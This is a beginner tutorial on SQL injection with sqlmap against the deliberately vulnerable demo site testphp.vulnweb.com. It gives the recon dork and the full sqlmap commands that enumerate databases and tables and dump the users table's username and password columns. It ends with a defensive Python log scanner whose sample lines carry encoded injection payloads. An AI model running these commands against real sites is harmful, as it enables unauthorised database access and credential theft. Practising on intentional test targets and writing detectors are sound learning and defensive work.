SQLMAP_BASICS

Let's start:

BASIC SQL INJECTION USING SQLMAP:

First, open a terminal and a browser.


Type this into the browser's search box:
vulnweb.com

Since we will be working with MySQL, click on the Acuart link.
It will show us the site's page.
Our target is to exploit the database of this website.

Basic recon: we need the actual link of this page. For that, type this query into the search box:
site:http://testphp.vulnweb.com/ php?id=
The search results give us the links of the site's pages.
Suppose this is the link:
http://testphp.vulnweb.com/artists.php?artist=1

Now we can proceed to the exploitation.


We will use sqlmap.
Open the terminal and type:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

1. First we need to find out which databases the page has. Here --dbs enumerates the databases and -u gives the target URL.

It will show us the list of databases.


2. Here information_schema is a default database.
3. So we will go with acuart.
4. Run:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
In this command -D selects the database we found, and --tables lists the tables in the acuart database. It will show us the tables.

5. Now, using the same method, we can get into the tables and columns.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns

It will show the columns of the users table.

6. We can get the uname and pass columns by using these commands:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C uname --dump

and

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C pass --dump

It will dump the data into a directory on our PC.
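
Seen from the server side, the steps above leave a recognisable trail in the web access log. The Python sketch below is an added example, not part of the original page: it scans constructed sample log lines for requests whose artist parameter is not a plain number, contains UNION SELECT or information_schema, or arrives with sqlmap's self-identifying User-Agent. The log lines, IP addresses and rule names are assumptions made up for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format; not captured from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /artists.php?artist=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /artists.php?artist=1%20AND%205%3D5 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Mar/2024:10:00:09 +0000] "GET /artists.php?artist=-1%20UNION%20ALL%20SELECT%20NULL%2Cschema_name%2CNULL%20FROM%20information_schema.schemata HTTP/1.1" 200 4711 "-" "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.4 - - [10/Mar/2024:10:01:00 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 4980 "-" "Mozilla/5.0 (Macintosh)"
"""

# Captures: client IP, request target, User-Agent.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
UNION = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)

def classify(path, user_agent):
    """Return the reasons a request looks like automated SQL injection probing."""
    reasons = []
    # The User-Agent is trivial to change, so it is only one signal among several.
    if "sqlmap" in user_agent.lower():
        reasons.append("sqlmap-user-agent")
    # parse_qs URL-decodes values, so %20UNION%20 becomes " UNION ".
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for value in params.get("artist", []):
        # The artist parameter is a numeric ID; anything else is suspect.
        if not value.isdigit():
            reasons.append("non-numeric-artist")
        if UNION.search(value):
            reasons.append("union-select")
        if "information_schema" in value.lower():
            reasons.append("schema-enumeration")
    return reasons

def scan(log_text):
    """Return a list of (client_ip, reasons) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, path, ua = m.groups()
        reasons = classify(path, ua)
        if reasons:
            hits.append((ip, reasons))
    return hits

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ", ".join(reasons))
```

The third sample line carries a browser User-Agent and is still flagged, which is why the parameter checks matter more than the User-Agent match.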
